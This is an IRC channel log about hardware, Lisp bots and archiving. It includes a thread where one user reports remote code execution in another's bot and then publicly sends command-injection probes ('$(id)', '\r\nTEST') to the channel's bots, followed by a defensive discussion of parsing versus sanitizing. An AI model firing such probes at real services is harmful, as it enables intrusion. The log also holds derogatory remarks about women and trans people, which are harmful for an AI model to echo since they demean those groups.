mircea_popescu: | asciilifeform ty | [14:40] |
lobbes: | mircea_popescu makes sense | [14:40] |
mircea_popescu: | lobbes you lopped off a digit from the url it goes by #17924 | [14:40] |
lobbes: | Ahh that's what happened | [14:41] |
mircea_popescu: | asciilifeform you know, your page is stale. it was already fixed in the latest version! | [14:41] |
BingoBoingo: | http://btcbase.org/log/2018-04-03#1792546 << Here it isn't a singular entity running them. It's what they call gas stations without the gas pumps. | [14:41] |
a111: | Logged on 2018-04-03 18:37 mircea_popescu: http://btcbase.org/log/2018-04-03#1792321 << sounds like local knockoff. this thing only exists in cr, some local entrepreneur (in the proper sense of the term) made a supermarket that actually works. | [14:41] |
douchebag: | sounds good | [14:42] |
mircea_popescu: | BingoBoingo http://arc-anglerfish-arc2-prod-gruponacion.s3.amazonaws.com/public/24AKIANLPZAPNEEN7R4CXKBQIQ.jpg << looks like that ? | [14:42] |
BingoBoingo: | http://btcbase.org/log/2018-04-03#1792553 << Naturally and unnaturally. | [14:42] |
a111: | Logged on 2018-04-03 18:38 mircea_popescu: http://btcbase.org/log/2018-04-03#1792332 << with both mouths, one would hope. | [14:42] |
BingoBoingo: | !!up yangwao | [14:43] |
deedbot: | yangwao voiced for 30 minutes. | [14:43] |
BingoBoingo: | !!up yangwao_ | [14:43] |
deedbot: | yangwao_ voiced for 30 minutes. | [14:43] |
BingoBoingo: | yangwao_: Who is your daddy and what does he do? | [14:43] |
lobbes: | mircea_popescu: But yeah, I need to think through my designs a bit better. Problem is I'm probably missing some crucial first principles. | [14:43] |
mircea_popescu: | lobbes on the positive side, this is how they were born in the first place, by people thinking about it. no revelation under the sun. | [14:44] |
BingoBoingo: | mircea_popescu: Yeah, the Uruguayan things with that string on their signage don't look like that. | [14:44] |
lobbes: | Perhaps I ought to go through all my existing designs, map them out, and then blog post em for forum critique. | [14:44] |
mircea_popescu: | lobbes can't hurt anything. | [14:44] |
lobbes: | True dat. Anyways I'll bbl. Thanks for allowing me to brain pick | [14:46] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792337 << was that fedex'd ? | [14:47] |
a111: | Logged on 2018-04-03 17:05 BingoBoingo: asciilifeform: Remember, nothing of incredible value. I am still awaiting a birthday card from February. | [14:47] |
BingoBoingo: | mircea_popescu: Sent US mail, with "International Stamp" per the sender's description | [14:48] |
mircea_popescu: | worth trying a fedex type thing | [14:48] |
BingoBoingo: | Yeah | [14:48] |
douchebag: | later lobbes | [14:49] |
asciilifeform: | BingoBoingo, mircea_popescu : i learned today, that even shitazon ~will~ ship to BingoBoingoistan, BUT demands about 1 $ to every $ of item ordered , in 'import duty prepay' | [14:50] |
douchebag: | Do you guys know the specs of the server ? | [14:53] |
ben_vulpes: | mircea_popescu: is that free shipping to .uy? | [14:53] |
asciilifeform: | unfree | [15:00] |
asciilifeform: | (~on top of~ shipping) | [15:00] |
deedbot: | http://qntra.net/2018/04/venezuelas-education-minister-eat-less-if-you-want-to-see-food-in-supermarkets/ << Qntra - Venezuela's Education Minister: Eat Less If You Want To See Food In Supermarkets | [15:04] |
mircea_popescu: | ben_vulpes well yes. | [15:04] |
mircea_popescu: | douchebag it's above, http://btcbase.org/log/2018-04-03#1792521 | [15:04] |
a111: | Logged on 2018-04-03 18:27 asciilifeform: ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs ) | [15:04] |
mircea_popescu: | asciilifeform he was asking me not you lol. | [15:04] |
asciilifeform: | aaa | [15:04] |
* asciilifeform | thought q was re shitazon-to-uy | [15:05] |
douchebag: | How would this compare to a raspberry pi ? | [15:14] |
asciilifeform: | douchebag: similar, but without the closed shitware iron | [15:15] |
douchebag: | Forsure | [15:15] |
mircea_popescu: | douchebag it's basically a very fast i/o low cpu power box. | [15:18] |
asciilifeform: | not even so low -- 4 x 1.4GHz 64bit | [15:18] |
mircea_popescu: | the republic's de facto moving towards hardware specialization, there's on one hand the very heavy cpu machines (of which sha miners are a subset, phuctor is another, and so on), and then the sort of thing like this, typified by a trb node machine. | [15:19] |
mircea_popescu: | asciilifeform yeah. | [15:19] |
douchebag: | Ooh interesting | [15:19] |
douchebag: | hahaha | [15:20] |
douchebag: | this is hilarious | [15:20] |
douchebag: | https://i.imgur.com/S18PzjG.png | [15:20] |
douchebag: | Just saw this come in | [15:20] |
mircea_popescu: | as you don't do a lot of numbers churning, it might be the perfect item for you. and if not, well, we see. | [15:20] |
douchebag: | Awesome | [15:21] |
spyked: | re arm box, /me was considering buying the arm64 olinuxino from teh olimex people. the rockchip board seems very similar (++ on the USB3 port), but I can't seem to find it in the EU. | [15:24] |
asciilifeform: | spyked: olimex lives in eu | [15:25] |
BingoBoingo: | douchebag: If you keep impressing and outgrow the ARM thing, there are worse places to vacation after dropping off a box than Uruguay. The best weather here runs December to February though. | [15:25] |
mod6: | iirc this dude would be coming out of eastern europe. | [15:25] |
mod6: | instead of the united retards | [15:25] |
spyked: | asciilifeform yeah I was talking about the ROC-RK3328-CC. it seems a tad beefier than the olimex counterpart. but otherwise yeah, olimex live very close to me, had a board delivered in ~2 days some months ago. | [15:27] |
asciilifeform: | funnily enuff , it takes typically 3d to usa ! | [15:27] |
asciilifeform: | ( from bulgaria ) | [15:27] |
* asciilifeform | buys fairly often from olimex | [15:27] |
mircea_popescu: | spyked so you can get one from teh pizarro too! | [15:28] |
mircea_popescu: | mod6 wasn't he in chicago ? | [15:29] |
BingoBoingo: | Fucking Yankee from upstate | [15:30] |
mod6: | mircea_popescu: aha, iirc he said he's moving tho | [15:30] |
douchebag: | I will be in the United States in april | [15:30] |
mircea_popescu: | he is better than you rural hicks from southern ill! | [15:30] |
douchebag: | I'm leaving for eastern europe late may | [15:31] |
mod6: | douchebag: ah just through april tho? | [15:31] |
mod6: | ah, alright. will keep that in mind. | [15:31] |
spyked: | mircea_popescu: yeh I'm definitely considering that! the reason I've postponed getting an ARM board at all was the lack of a full-fledged SATA 3 port. I wanna get trb running on arm at some point among others. | [15:31] |
mircea_popescu: | missoury dunno even what chic is, while chicago had it long ago! | [15:31] |
BingoBoingo: | <mircea_popescu> he is better than you rural hicks from southern ill! << This is true. At his age I was solidly anti-productive. | [15:31] |
mircea_popescu: | spyked as described this item would actually make a great node. whether the practice holds is to be seen in practice. | [15:32] |
spyked: | also, as a fun-fact: I tried running lispbots on an old first-gen raspberry pi, but it seems SBCL doesn't support threading on ARM (at least not ARMv6 and ARMv7). so I want to test that on ARM64. | [15:32] |
asciilifeform: | spyked: i found 1st gen raspi (entirely aside the q of closed shitware) to be ~unusable -- it shared a usb bus between nic (already slow) and disk | [15:33] |
douchebag: | Oh but yeah, until then - let me know if there are any IRC bots or web applications you want me to take a look at | [15:33] |
spyked: | eh, I ended up using it to host my IRC bouncer. at least it's good enough for that. | [15:35] |
phf: | spyked: i prefer ccl on low powered machines, the only parts of trinque's bot that rely on sbcl are one or two functions related to thread management | [15:37] |
mircea_popescu: | phf still though, losing out on threading on a quad machine is a little dumb. | [15:37] |
phf: | oh, right, that wasn't obvious from what i said, ccl supports multithreading on arms | [15:38] |
mircea_popescu: | a it does ? | [15:38] |
spyked: | oh cool | [15:38] |
mircea_popescu: | i suppose the question of lisp standardization, soon to be visited upon our fair republic, will be one helluva burning flame. | [15:38] |
phf: | i believe rainer joswig hosts his websites on some arm box with CL-HTTP on top of it | [15:38] |
mircea_popescu: | spyked a good move at this point i guess would be patching trinque 's bot to be all cll. | [15:39] |
mircea_popescu: | speaking of pantsuit refraction lulz, https://news.ycombinator.com/item?id=587045 | [15:41] |
ben_vulpes: | mircea_popescu: thanks for extending the counteroffer, i'll take it. will you take payment in pizarro credits? | [15:41] |
mircea_popescu: | oh, and : lobbes other than the design review, consider lifting the whole of gutenberg into your archive ? the idiots already have a https that is broken, so far http only works but who knows how long. | [15:41] |
mircea_popescu: | ben_vulpes cash or bonds, though for the latter no actual discount was discussed in teh nsa boardroom. but i guess i'll go with .4 off the cuff and hope nobody throws gavels at me. | [15:42] |
* trinque | uses ccl elsewhere, would gladly sign that patch | [15:44] |
ben_vulpes: | mircea_popescu: works, i'll take it for bonds | [15:44] |
mircea_popescu: | epic contributions from "paul nakata" (hey, nobody on a stick but has a keybase key), some dork who "programs in cl every day" and the whole menagerie of "nobody told us to shut the fuck up like, ever" | [15:45] |
mircea_popescu: | ben_vulpes cool. that takes s.nsa pile to .9 if memory serves ? | [15:46] |
ben_vulpes: | correct you are | [15:46] |
spyked: | mircea_popescu, it's good timing, since I've been doing some reading ircbot code and comparing with my own implementation. I've actually been contemplating http://btcbase.org/log/2018-02-26#1786288 and rolling my own was not a wholly useless endeavour, i.e. http://trilema.com/2016/how-to-participate-in-the-affairs-of-the-most-serene-republic/#selection-322.0-322.5 so I'll document the whole thing on the blog. | [15:46] |
a111: | Logged on 2018-02-26 17:11 mircea_popescu: spyked the bot is a solved problem, genesis and all. | [15:46] |
mircea_popescu: | cool. | [15:47] |
deedbot: | http://qntra.net/2018/04/british-government-lab-admits-no-evidence-for-scandal-used-to-blow-up-diplomatic-relations-and-court-european-sympathy/ << Qntra - British Government Lab Admits No Evidence For Scandal Used To Blow Up Diplomatic Relations And Court European Sympathy | [15:49] |
mircea_popescu: | BingoBoingo mind redirecting www to . sometime too ? | [15:51] |
asciilifeform: | umm qntra down ?? | [15:51] |
BingoBoingo: | mircea_popescu: Sure, I will take a look at it | [15:52] |
mircea_popescu: | try without the www | [15:52] |
asciilifeform: | or nm worx | [15:52] |
phf: | http://btcbase.org/log/2018-04-03#1792608 kek | [15:52] |
a111: | Logged on 2018-04-03 19:20 douchebag: https://i.imgur.com/S18PzjG.png | [15:52] |
mircea_popescu: | "in natural languages, we are used to context. indeed, contextual meaning is what makes natural languages natural. we have `list' as a verb, and we have `list' as a noun. we have `listless' as an adjective describing something (like a programming language) that does not have lists, and an adjective describing someone who is sort of permanently tired. when we need to disambiguate, we do so with more words." | [15:54] |
mircea_popescu: | this actually misses the all-important mechanism. "when we need to disambiguate, we add more words such as to contradict one of the two possible solutions the string could eval to" | [15:54] |
mircea_popescu: | whole fucking natural language is nothing beyond "add aix^i terms until the damned P has only one real root." | [15:55] |
mircea_popescu: | and "default" is not a perfectly reasonable variable name holy shit. is this guy going to name his daughter "Cunt" ? | [15:58] |
mircea_popescu: | asciilifeform http://p.bvulpes.com/pastes/KLT6U/?raw=true | [16:02] |
asciilifeform: | mircea_popescu: yay! and yes. | [16:19] |
asciilifeform: | 2 per crate. | [16:20] |
mircea_popescu: | cool. | [16:20] |
shinohai: | > Bans gun videos, gets live-action shooting instead http://archive.is/NyMvo | [17:04] |
trinque: | shinohai: https://archive.is/TgtPb << breitbart didn't neglect the "wearing a headscarf" deets | [17:06] |
shinohai: | Allah snackbar! | [17:07] |
asciilifeform: | 'We are seeing @YouTube employees being brought out with hands up!' << lol | [17:07] |
trinque: | they didn't offer up their assholes quick enough? | [17:07] |
mircea_popescu: | heh | [17:14] |
deedbot: | http://trilema.com/2018/on-namespaces/ << Trilema - On namespaces | [17:44] |
douchebag: | glad work is over | [17:48] |
douchebag: | Fucking had this dude from work looking over my shoulder | [17:48] |
douchebag: | asking questions about everything I type in my terminal | [17:49] |
mircea_popescu: | what sort of chickenfarm do you work in lol | [17:51] |
douchebag: | Most of the people there are alright | [17:52] |
douchebag: | This is just a new kid who just likes asking too many questions | [17:52] |
asciilifeform: | damn i had nfi douchebag were chained to an oar. suxx. | [17:52] |
douchebag: | and doesn't understand it's considered disrespectful to stare at someone else's computer screen | [17:52] |
douchebag: | nfi? | [17:53] |
mircea_popescu: | no fucking idea | [17:54] |
douchebag: | ahh | [17:54] |
douchebag: | Yeah no it was fine most of the day, this kid would just get out of his seat and stand behind me and start staring at what I was doing and asked a bunch of questions | [17:55] |
douchebag: | how about that shooting though | [17:59] |
douchebag: | so much for mass shooting being a men only sort of deal | [17:59] |
asciilifeform: | bbut lead is banned in californistan!111 | [18:01] |
asciilifeform: | what nao, ban tits ? | [18:01] |
douchebag: | lolol | [18:04] |
douchebag: | asciilifeform: Only womens tits | [18:04] |
douchebag: | Tranny tits are a-okay in California | [18:04] |
mircea_popescu: | basically "liberation" and "4th wave feminism" consists of a bunch of male dweebs with no utility that nobody wants appropriating femininity and taking over boobs. | [18:15] |
mircea_popescu: | ain't enough they kicked women out of the last well paying job available to them (nursing), now they're gonna steal the tits, too ? | [18:15] |
asciilifeform: | lol waitasec this was a trans-postal? | [18:17] |
mircea_popescu: | nfi, i was discussing the "women in tech" trend generally. | [18:19] |
asciilifeform: | aa | [18:19] |
mircea_popescu: | there's by now a large and visible class of dweebs who considered the "should i learn github or get boobs" dilemma and came out with "better get boobs -- govt pays for it." | [18:20] |
douchebag: | Men need to stop acting like women and women need to stop acting like men, imo | [18:20] |
mircea_popescu: | men can't stop acting like women -- there's really nothing else for them. | [18:20] |
asciilifeform: | in other 'holyfuq, chinesium', 1500000 (!) baud default uart. | [18:23] |
* asciilifeform | in fact was not able to find a single usb uart that will reliably rx it: had to use logic analyzer | [18:24] |
* asciilifeform | did in the end find one : ye olde ft232 | [18:38] |
shinohai: | http://therealbitcoin.org/ml/btc-dev/2018-April/000295.html << ty jurov for handling donation, cheers! [~]D | [18:48] |
mod6: | Hey, thanks for your donation shinohai! | [18:55] |
shinohai: | cheers as well! o7 | [18:55] |
douchebag: | just buy the fucking water filters already | [19:06] |
lobbes: | oy, yup this is the spoofed user agent that the phantomjs portion of the process was using. RCE was happening both at the bash level AND via the headless browser.. I got poked in several orifices >> http://btcbase.org/log/2018-04-03#1792665 | [19:36] |
a111: | Logged on 2018-04-03 19:52 a111: Logged on 2018-04-03 19:20 douchebag: https://i.imgur.com/S18PzjG.png | [19:36] |
lobbes: | !!v B7975B7CA5C064DEC53DCE43D14C35C0F1D735FB0F849EE418B922F3A81502F5 | [19:36] |
deedbot: | lobbes rated douchebag 2 << exploited several security holes in my archive process, but was nice enough to tell me rather than pwn me | [19:36] |
douchebag: | <3 | [19:37] |
douchebag: | lobbes: Mind sharing the source code? I could perhaps help you identify further exploits | [19:37] |
douchebag: | i wonder | [19:37] |
douchebag: | !!ratings douchebag | [19:39] |
deedbot: | http://p.bvulpes.com/pastes/AhSME/?raw=true | [19:39] |
douchebag: | !!reputation douchebag | [19:39] |
deedbot: | http://p.bvulpes.com/pastes/xgnGJ/?raw=true | [19:39] |
lobbes: | my plan tonight is to go through and map out whole process (I'll probably tar up my code after I attempt to sanitize inputs), will bake a blog post exposing my naivete to forum at large | [19:40] |
lobbes: | I gotta learn somehow | [19:40] |
phf: | mircea_popescu: "Unlike obligate coprophagiacs, subsistence hunters could not be stone age fucktards, but for whatever reason opt not to." is there a double not in there? | [19:41] |
shinohai: | dont be so hard on self, supbybot/limnoria is broken so beautifully anyway | [19:41] |
douchebag: | lobbes: I'll help you make your bot more secure | [19:41] |
lobbes: | ty douchebag! much appreciated | [19:42] |
lobbes: | and shinohai, as much as I'd like to blame this on supybot, this one is all me (the exploited code was all brewed by yours truly) | [19:42] |
douchebag: | Just tell me essentially what it is you're trying to do, what you have already tried, and then I'll suggest you how to write it properly | [19:43] |
shinohai: | O.o nb lobbes | [19:43] |
lobbes: | douchebag well, it is very convoluted atm. besides, I'd rather there be a static page I can point to than just barfing it in the logs | [19:47] |
lobbes: | I agree this needs archiving (I'm currently working off their version of kritik der reinen vernunft as a german study aid). However, unlike kibo.com I would wager the entirety of gutenberg is much much larger. I'd prolly need moar storage than the ~200gb ssd on the dedicated home craptop I'm currently using (but maybe not) >> http://btcbase.org/log/2018-04-03#1792648 | [19:48] |
a111: | Logged on 2018-04-03 19:41 mircea_popescu: oh, and : lobbes other than the design review, consider lifting the whole of gutenberg into your archive ? the idiots already have a https that is broken, so far http only works but who knows how long. | [19:48] |
* lobbes | bbl food | [19:48] |
douchebag: | Forsure, I'm rather experienced with application design from a security perspective so just let me know if you have any questions | [19:48] |
douchebag: | Just make sure a problem like that doesn't occur again. Remote code execution is just as bad as it can get | [19:49] |
trinque: | heh, meanwhile, all of sexual reproduction is based on getting those RCEs | [19:51] |
douchebag: | trinque: That's true | [19:51] |
douchebag: | and I'll tell you why, when working for a company doing a security audit - you will get paid the most for RCE. Women love money, and that money can be used to help take care of the children | [19:53] |
douchebag: | PWN BOXES 2 HELP THE CHILDREN | [19:53] |
trinque: | why, is that's what sperm do, my man. | [19:54] |
douchebag: | eventually | [19:56] |
trinque: | http://btcbase.org/log/2016-09-17#1543393 << thread | [19:56] |
a111: | Logged on 2016-09-17 02:55 mircea_popescu: trinque fancy that, you had to have someone tell you! nature teaches by example, you stick more data into woman each time than you ever did into all machines you ever touched. yet... | [19:56] |
douchebag: | trinque: What other bots are in here besides lobbes and deedbot | [19:56] |
asciilifeform: | pehbot ! | [19:56] |
douchebag: | whats the syntax | [19:56] |
trinque: | ^ and mimisbrunnr | [19:56] |
asciilifeform: | !!up pehbot | [19:57] |
deedbot: | pehbot voiced for 30 minutes. | [19:57] |
douchebag: | also syntax for mimisbrunnr | [19:57] |
asciilifeform: | !A help | [19:57] |
pehbot: | asciilifeform: I am PehBot. See also http://www.loper-os.org/?p=2051 . My Width is currently fixed to 256 and Height to 32. | [19:57] |
trinque: | I think mimisbrunnr only quotes log-lines it's ben_vulpes' | [19:57] |
asciilifeform: | !#s pehbot | [19:58] |
a111: | 98 results for "pehbot", http://btcbase.org/log-search?q=pehbot | [19:58] |
asciilifeform: | ^ see also. | [19:58] |
douchebag: | !#s $(id) | [20:00] |
a111: | 0 results for "$(id)", http://btcbase.org/log-search?q=$%28id%29 | [20:00] |
BingoBoingo: | http://btcbase.org/log/2018-04-03#1792659 << fixed | [20:00] |
a111: | Logged on 2018-04-03 19:51 mircea_popescu: BingoBoingo mind redirecting www to . sometime too ? | [20:00] |
douchebag: | !#help | [20:02] |
douchebag: | !#h | [20:02] |
douchebag: | !A 'help | [20:03] |
pehbot: | douchebag: EGGOG: Pos: 0: Stack Underflow! | [20:03] |
douchebag: | !A ''help | [20:03] |
pehbot: | douchebag: EGGOG: Pos: 0: Stack Underflow! | [20:03] |
douchebag: | !A help | [20:03] |
pehbot: | douchebag: I am PehBot. See also http://www.loper-os.org/?p=2051 . My Width is currently fixed to 256 and Height to 32. | [20:03] |
trinque: | any chance this can be done in pm asciilifeform ? | [20:03] |
mod6: | ^ | [20:03] |
trinque: | before someone gets cranky? | [20:03] |
douchebag: | I agree | [20:03] |
mod6: | too late | [20:03] |
asciilifeform: | trinque: not as such. BUT he really oughta build the proggy and do it in his own shell. | [20:03] |
trinque: | there ya go. | [20:04] |
douchebag: | kk | [20:04] |
douchebag: | can I try one last command really quick? | [20:05] |
asciilifeform: | sure? | [20:05] |
douchebag: | !#s \r\nTEST | [20:05] |
a111: | 0 results for "\\r\\nTEST", http://btcbase.org/log-search?q=%5Cr%5CnTEST | [20:05] |
douchebag: | Good job stripping them ! | [20:06] |
asciilifeform: | actually, douchebag , it does no such thing | [20:06] |
asciilifeform: | well, pehbot that is | [20:06] |
douchebag: | I was talking about a111 | [20:06] |
asciilifeform: | aa | [20:07] |
douchebag: | If those lines weren't stripped I could potentially send my own commands to the ircd | [20:07] |
asciilifeform: | i've temporarily moved it to #asciilifeform-test, douchebag , justforyou ! | [20:07] |
douchebag: | thx <3 | [20:08] |
asciilifeform: | plz join. | [20:08] |
phf: | which reminds me that i should implement the help feature, a111 is not conformant at the moment | [20:11] |
phf: | douchebag: a111 logs, speaks logs, responds to #!s #!seen #!seenbefore #!born and #!vulpes | [20:17] |
phf: | of which only #!s and #!seen are useful, and #!born mildly interesting | [20:18] |
phf: | #!born douchebag | [20:18] |
phf: | !#born douchebag | [20:18] |
a111: | 2018-01-11 <douchebag> douchebag | [20:18] |
a111: | http://btcbase.org/log/2018-01-11#1768869 | [20:18] |
douchebag: | http://btcbase.org/log/2018-04-03#$(id) | [20:20] |
phf: | well, since we're testing things http://btcbase.org/log/2018-04-03#1231231231231 | [20:21] |
douchebag: | phf: What sort of topics do you primarily focus on? | [20:22] |
douchebag: | In regards to programming/security/technology etc. | [20:23] |
phf: | it really depends on when | [20:29] |
phf: | but relevant to the conversation, i grew up in russia in the 90s, so i did infosec until 2005 or so | [20:30] |
phf: | there might be an xss somewhere in btcbase, but highly unlikely | [20:34] |
phf: | i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues | [20:35] |
phf: | so cl-irc isn't "stripping away" faulty sequences, there's a state machine parser there that only accepts a valid irc protocol, likewise the renderer is not escaping html, instead the dom is constructed server side and where you have strings, you can only have strings. they will be serialized into html according to html escaping rules. | [20:37] |
asciilifeform: | phf: i was vaguely hoping he might grasp this by playing with pehbot / reading ffa but loox like no dice so far | [20:46] |
asciilifeform: | going by the log in #asciilifeform-test, d00d 1) still refuses to actually read the proggy 2) continues to think that it remaining standing has something at all to do with 'sanitizing' or anticipating whatever attack | [20:48] |
douchebag: | I've never programmed in the language it was written in | [20:49] |
douchebag: | So it makes it a bit difficult | [20:50] |
asciilifeform: | being one of the few languages with actual docs, and of which i used a deliberately small subset -- oughta be pretty simple. | [20:50] |
asciilifeform: | ( oop for instance is not used. nor is heap allocation . ) | [20:51] |
asciilifeform: | meanwhile, in sads, RK3328 ( and in fact every arm cpu in production ) won't boot without a ~1MB evil blob (that in fact runs on dedicated evil-core, just like intel's ME . ) so much for 'published errything.' | [21:06] |
asciilifeform: | and, interestingly, the entire public net appears to be EMPTY of ANY discussion of a cure. | [21:06] |
lobbes: | so, this is kind of like the "default-deny" philosophy? "you may only build the house from this valid list of materials" versus "grab any material you can find, but watch out for this list of lethal building materials"? >> http://btcbase.org/log/2018-04-04#1792809 | [21:38] |
a111: | Logged on 2018-04-04 00:35 phf: i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues | [21:38] |
trinque: | the grammar asserts what ought to be there; it rejects everything else, but it didn't reject the "all else" item by item. | [21:59] |
lobbes: | hm yeah, applying this to my case: there is only ONE point where user-entered data enters into the process, and that is where the bot snarfs from the chan and inserts into the first sqlite3 db. So really, I just need to teach THAT part of my process what a valid url is, and then parse accordingly | [22:01] |
trinque: | parser implements a given grammar, turning a string (whether considered as text or raw bits) into an abstract syntax tree | [22:01] |
lobbes: | hm okay, this is a bit over my head, but you are saying that I need to understand what the grammar for a url is, and then have the parser follow that grammar? | [22:03] |
douchebag: | lobbes: Why not completely avoid sending any user input to a bash interpreter at all? | [22:08] |
lobbes: | well, it seems like phf's (and others') approach is slightly saner. Even if user input doesn't go to bash, well.. what about the phantomjs exploit you found | [22:09] |
lobbes: | I cannot possibly enumerate what I haven't thought of | [22:09] |
lobbes: | but I CAN enumerate a valid url | [22:10] |
trinque: | sure douchebag, not saying do that either | [22:11] |
lobbes: | yeah, true, I really should do both | [22:12] |
lobbes: | there's also an additional precaution I could take: instead of the thing being on an hourly cronjob, I could easily set up a quick 'validation report' for myself and then pull a 'manual' crank to initiate everything | [22:19] |
lobbes: | ala deedbot and other items | [22:19] |
asciilifeform: | hey trinque , i was attempting a gentoo , and found that i cannot even extract a 2016 stage3 on a sane box because --xattrs-include='*.*' and my tar has nfi what xattrs are | [22:30] |
asciilifeform: | trinque: any idea when this liquishit crept in ? | [22:30] |
asciilifeform: | what's the most recent stage3 that hasn't got it ? | [22:30] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792728 << yes, actually. x could not be y, but opt to not-not be y. is this bad ? | [22:48] |
a111: | Logged on 2018-04-03 23:41 phf: mircea_popescu: "Unlike obligate coprophagiacs, subsistence hunters could not be stone age fucktards, but for whatever reason opt not to." is there a double not in there? | [22:48] |
asciilifeform: | incidentally trinque do you know of a musltronic stage3 for arm ? | [22:49] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792736 << it's not that big. but, if indeed it is that big this is a reason to find more storage space, can't really cut them off. | [22:52] |
a111: | Logged on 2018-04-03 23:48 lobbes: I agree this needs archiving (I'm currently working off their version of kritik der reinen vernunft as a german study aid). However, unlike kibo.com I would wager the entirety of gutenberg is much much larger. I'd prolly need moar storage than the ~200gb ssd on the dedicated home craptop I'm currently using (but maybe not) >> http://btcbase.org/log/2018-04-03#1792648 | [22:52] |
mircea_popescu: | http://btcbase.org/log/2018-04-03#1792743 << bwahaha wut. | [22:53] |
a111: | Logged on 2018-04-03 23:53 douchebag: and I'll tell you why, when working for a company doing a security audit - you will get paid the most for RCE. Women love money, and that money can be used to help take care of the children | [22:53] |
mircea_popescu: | !!up candi_lustt | [22:54] |
deedbot: | candi_lustt voiced for 30 minutes. | [22:54] |
mircea_popescu: | ^ there douchebag , now you can learn lips. | [22:54] |
mircea_popescu: | and in other "best villains of the silver screen", https://www.youtube.com/watch?v=-N9LnkKQfuc | [22:55] |
mircea_popescu: | #!born douchebag | [22:57] |
mircea_popescu: | !#born phf | [22:58] |
a111: | 2014-03-20 <phf> not quite | [22:58] |
a111: | http://btcbase.org/log/2014-03-20#570859 | [22:58] |
mircea_popescu: | phf it's supposed to produce no more than one line per command. | [22:58] |
mircea_popescu: | http://btcbase.org/log/2018-04-04#1792811 << this is not something that can be "grasped" as such. | [23:00] |
a111: | Logged on 2018-04-04 00:46 asciilifeform: phf: i was vaguely hoping he might grasp this by playing with pehbot / reading ffa but loox like no dice so far | [23:00] |
mircea_popescu: | much in the vein astronomy can not be grasped playing with ptolemaic spheres. | [23:01] |
mircea_popescu: | http://btcbase.org/log/2018-04-04#1792809 << links ? hm ? HM ? | [23:01] |
a111: | Logged on 2018-04-04 00:35 phf: i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues | [23:01] |
mircea_popescu: | i mean my talk to ro politicians about basic economics from like 2005 is on the fucking web ffs! | [23:02] |
mircea_popescu: | and the time i burned the koran/bible and the time i stabbed that rabbit and so following. | [23:02] |
* asciilifeform | actually watches the 2005 one , it was lulzy | [23:02] |
asciilifeform: | *watched | [23:02] |
mircea_popescu: | dja understand what it says ? | [23:03] |
asciilifeform: | at the time understood maybe half . really oughta rewatch these days | [23:03] |
mircea_popescu: | http://trilema.com/2009/banii-oamenii-si-valorile-liberale/ << uncharacteristically for vloggers, transcript is available. | [23:04] |
asciilifeform: | oh hah. | [23:04] |
asciilifeform: | this almost takes out all the sport tho. | [23:04] |
mircea_popescu: | myeah. | [23:04] |
mircea_popescu: | incidentally, the comments are something else. | [23:10] |
asciilifeform: | http://p.bvulpes.com/pastes/LsmJG/?raw=true << d00d's total effort in re pehbot , thus far. | [23:11] |
mircea_popescu: | im sure he'll say something if he finds something neh | [23:12] |
asciilifeform: | doesn't show any symptoms of approaching the thing in any way other than http://btcbase.org/log/2016-05-01#1460013 | [23:12] |
a111: | Logged on 2016-05-01 14:53 mircea_popescu: asciilifeform> mod6: the baked-in presumption of webtardism is almost insulting << it is insulting, not to us though. think about it : the crab has pincers because in its environment THAT WORKS and so does "GET /blog/blog-config.php~". | [23:12] |
mircea_popescu: | eh, what's the rush. | [23:23] |
mircea_popescu: | http://btcbase.org/log/2018-04-04#1792817 << fuck 'em. let them sell to each other for bitpaybux until they fall over for all i care. | [23:24] |
a111: | Logged on 2018-04-04 01:06 asciilifeform: meanwhile, in sads, RK3328 ( and in fact every arm cpu in production ) won't boot without a ~1MB evil blob (that in fact runs on dedicated evil-core, just like intel's ME . ) so much for 'published errything.' | [23:24] |
mircea_popescu: | http://btcbase.org/log/2018-04-04#1792818 << the english web is empty of EVERYTHING. there isn't anything there. i looked. | [23:24] |
a111: | Logged on 2018-04-04 01:06 asciilifeform: and, interestingly, the entire public net appears to be EMPTY of ANY discussion of a cure. | [23:24] |
asciilifeform: | mircea_popescu: it's chinese, therefore lulzy. mine seems to boot up with the shitrom broken... | [23:25] |
mircea_popescu: | yes but it probably doesn't have $random-useless-feature!!1 | [23:25] |
asciilifeform: | boots -- believe or not -- a gentoo. | [23:26] |
asciilifeform: | as of 5min ago. | [23:26] |
mircea_popescu: | http://btcbase.org/log/2018-04-04#1792831 << this is the worst choice, in general. | [23:26] |
a111: | Logged on 2018-04-04 02:19 lobbes: there's also an additional precaution I could take: instead of the thing being on an hourly cronjob, I could easily set up a quick 'validation report' for myself and then pull a 'manual' crank to initiate everything | [23:26] |
mircea_popescu: | http://btcbase.org/log/2018-04-04#1792834 << ext4 | [23:28] |
a111: | Logged on 2018-04-04 02:30 asciilifeform: trinque: any idea when this liquishit crept in ? | [23:28] |
mircea_popescu: | fwiw, iirc reiserfs has them too. | [23:28] |
asciilifeform: | it's in tar. | [23:28] |
asciilifeform: | from 1.27 and up. | [23:28] |
asciilifeform: | q for trinque was , when did gentoo stage3 start using this 'feature'. | [23:29] |
mircea_popescu: | probably once they started supporting ext4. | [23:29] |
mircea_popescu: | anyway, odds are you can just take it out. | [23:29] |
asciilifeform: | nope. $box supports ext4 , but tar 1.26. | [23:29] |
mircea_popescu: | just drop the flag, see what happens. | [23:29] |
asciilifeform: | and i untarred in spite of this oddity, and the only barf was that python, ping, and cc1 binaries failed to extract. but oddly enuff extracted later manually... | [23:30] |
asciilifeform: | and appear to work | [23:30] |
mircea_popescu: | anyway. extended attributes is this ~dead standard that got implemented anyway, basically a kludgy extension of chown. | [23:31] |
* asciilifeform | did realize this | [23:31] |
mircea_popescu: | the flag tells tar whether to store this extra metadata with the files or not. generally dropping it has no effect. ah ok then | [23:31] |
* trinque | couldn't say, haven't tilted at tar just yet | [23:38] |